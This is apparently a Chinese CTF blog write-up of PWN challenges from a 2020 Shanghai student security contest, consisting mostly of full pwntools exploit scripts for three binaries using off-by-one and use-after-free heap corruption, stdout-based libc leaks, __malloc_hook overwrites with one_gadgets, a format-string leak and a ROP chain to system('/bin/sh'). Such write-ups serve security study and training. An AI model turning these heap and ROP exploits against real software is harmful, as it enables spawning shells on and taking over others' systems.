2020上海赛PWN writeup | This is NOTRIX

2020上海大学生网络安全竞赛

除了lgtwo都是抄的别的地方的题(有可能lgtwo也是抄的)，👴真是服

lgtwo

Off-by-one和爆破stdout
没有pie所以有了libc之后还可以unlink去bss上改堆记录指针

exp：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: n0trix -*-

from pwn import *

#context.terminal = ['tmux','splitw','-v']
context.log_level = 'debug'
#io = remote('123.56.52.128',45830)
elf = ELF('./lgtwo')
libc   = ELF('/mnt/hgfs/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc-2.23.so')
ld     = ELF('/mnt/hgfs/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/ld-2.23.so')
io     = process(argv=[ld.path,elf.path],env={"LD_PRELOAD" : libc.path})

def add(size,con='A'):
    io.sendlineafter('>> ','1')
    io.sendlineafter('size?\n',str(size))
    io.sendafter('content?\n',con)

def add2(size,con='A'):
    io.sendlineafter('>> ','1')
    io.sendlineafter('size?',str(size))
    io.sendafter('content?',con)


def dele(idx):
    io.sendlineafter('>> ','2')
    io.sendlineafter('index ?\n',str(idx))
def dele2(idx):
    io.sendlineafter('>> ','2')
    io.sendlineafter('index ?',str(idx))

def edit(idx,con):
    io.sendlineafter('>> ','4')
    io.sendlineafter('index ?\n',str(idx))
    io.sendafter('content ?\n',con)

def edit2(idx,con):
    io.sendlineafter('>> ','4')
    io.sendlineafter('index ?',str(idx))
    io.sendafter('content ?',con)
#fake = 0x7f0823975620
add(0x18) #0
add(0x18) #1
add(0x68) #2
add(0x18) #3
add(0x10) #4
gdb.attach(io)
edit(0,'A'*0x18+'\xb1') #0
#unsort
dele(1)
#fastbin
dele(2)

add(0x18) #1
add(0x88) #2
edit(2,'\xdd\x25')
edit(1,'a'*0x18+p8(0x70))
#gdb.attach(io)
add(0x68) #5
add(0x68) #6
edit(6,0x33*'\x00'+p64(0xfbad1800)+p64(0)*3+'\x00')
libc_base = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 3954176
log.success('libc: '+hex(libc_base))
system = libc_base + libc.sym['system']
one = [0x45226,0x4527a,0xf0364,0xf1207]

add2(0x18) #7
add2(0x18) #8
add2(0x68) #9
add2(0x18) #10
add2(0x10) #11

edit2(7,'A'*0x18+'\xb1')
dele2(8)
dele2(9)
add2(0x18) #8
add2(0x88) #9
edit2(9,p64(libc_base+libc.sym['__malloc_hook']-0x23))
edit2(8,'a'*0x18+p8(0x70))
add2(0x68) #12
add2(0x68) #13
edit2(13,(0x13-8)*'\x00'+p64(one[1]+libc_base)+p64(libc_base+libc.sym['realloc']+2))
#edit2(13,0x13*'\x00'+p64(one[0]+libc_base))
io.sendlineafter('>> ','1')
io.sendlineafter('size?','10')
io.interactive()

majone

国赛原题，一毛一样，字符串都没改
uaf漏洞，换了一种方法，利用假堆块构造overlap

直接放exp:

from pwn import *

context.terminal = ['tmux','splitw','-v']
context.log_level = 'info'

io = process('./pwn')
elf = ELF('./pwn',checksec=False)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
one = [0x45226,0x4527a,0xf0364,0xf1207]

def add(size,tag,ch=1):
    io.sendlineafter('>> ','1')
    if ch == 1:
        io.sendlineafter('question\n\n','81')
        io.sendlineafter('?\n',str(size))
        io.sendlineafter('?\n',tag)
    else:
        io.sendlineafter('question\n','81')
        io.sendlineafter('?',str(size))
        io.sendlineafter('?',tag)



def dele(idx,ch=1):
    io.sendlineafter('>> ','2')
    if ch == 1:
        io.sendlineafter('index ?\n',str(idx))
    else:
        io.sendlineafter('index ?',str(idx))

def edit(idx,con,ch=1):
    io.sendlineafter('>> ','4')
    if ch==1:
        io.sendlineafter('index ?\n',str(idx))
        io.sendafter('content ?\n',con)
    else:
        io.sendlineafter('index ?',str(idx))
        io.sendafter('content ?',con)

def pwn():
	add(0x10,'0')
	add(0x20,'1')
	add(0x58,'2')
	add(0x68,'3')
	add(0x10,'4')
	edit(1,p64(0)*3+p64(0x21)) #fake offset 0x50
	dele(0)
	dele(4)
	edit(4,'\x40')
	#gdb.attach(io)
	add(0x10,'5')

	#get fake chunk
	add(0x10,'6')
	edit(6,p64(0)+p64(0xd1))

	dele(2)
	dele(3)
	add(0x58,'7')
	edit(3,'\xdd\x55')
        #gdb.attach(io)
	add(0x68,'8')

        #get stdout
	add(0x68,'9')
        edit(9,51*'A'+p64(0xfbad1800)+p64(0)*3+'\x48')
        libc_base = u64(io.recvuntil('\x7f').ljust(8,'\x00'))-3954339
        log.success('libc: '+hex(libc_base))
        malloc_hook = libc_base + libc.sym['__malloc_hook']
        dele(8,2)
        edit(8,p64(malloc_hook-0x23),2)
        add(0x68,'10',2)
        add(0x68,'11',2)
        edit(11,0x13*'\x00'+p64(one[3]+libc_base),2)
        io.sendlineafter('>> ','1')
        io.sendlineafter('question\n','81')
        io.sendlineafter('?','10')

#pwn()
while True:
    try:
        pwn()
    except:
        io.close()
        io = process('./pwn')
        continue
    else:
        break

io.interactive()

easyabnormal

据说湖湘杯原题，湖湘杯睡觉了，没打，有空学一下

exp：

from pwn import *
context(log_level='info',os='linux',arch='amd64')
#p=remote('123.56.52.128','10012')
libc = ELF('/mnt/hgfs/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc-2.23.so')
ld = ELF('/mnt/hgfs/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/ld-2.23.so')
elf = ELF("./easyabnormal")
p  = process(argv=[ld.path,elf.path],env={"LD_PRELOAD" : libc.path})
def name():
	p.recvuntil("CHOICE :")
	p.sendline('1')

def add(content):
	p.recvuntil("CHOICE :")
	p.sendline('2')
	p.recvuntil("cnt:")
	p.sendline(content)
def free(id):
	p.recvuntil("CHOICE :")
	p.sendline('3')
	p.recvuntil("idx:")
	p.sendline(str(id))
def show():
	p.recvuntil("CHOICE :")
	p.sendline('4')
def backdoor(content):
	p.recvuntil("CHOICE :")
	p.sendline('23333')
	p.recvuntil("INPUT")
	p.send(content)

p.recvuntil(":")
p.send('%11$p')#leak
name()
p.recvuntil('INFO:')
libc_base = int(p.recv(14),16)-240-libc.sym['__libc_start_main']
print(hex(libc_base))

ret = libc_base + 0x937 
pop_rdi= libc_base + 0x21112

system = libc_base + libc.sym['system']
print(hex(system))
str_binsh = libc_base + libc.search('/bin/sh').next()
payload = p64(ret)+p64(pop_rdi)+p64(str_binsh)+p64(system)

add('a')
add('b'*0x18+payload)
free(1)
free(0)
show()
p.recvuntil("1:")
heap_addr = u64(p.recv(6).ljust(8,'\x00'))
print(hex(heap_addr))
print(hex(libc_base))
#gdb.attach(p)
#pause()
backdoor('a'*0x20+p64(heap_addr+0x20))
p.interactive()

Cpu_emulator

8会做，等后续补上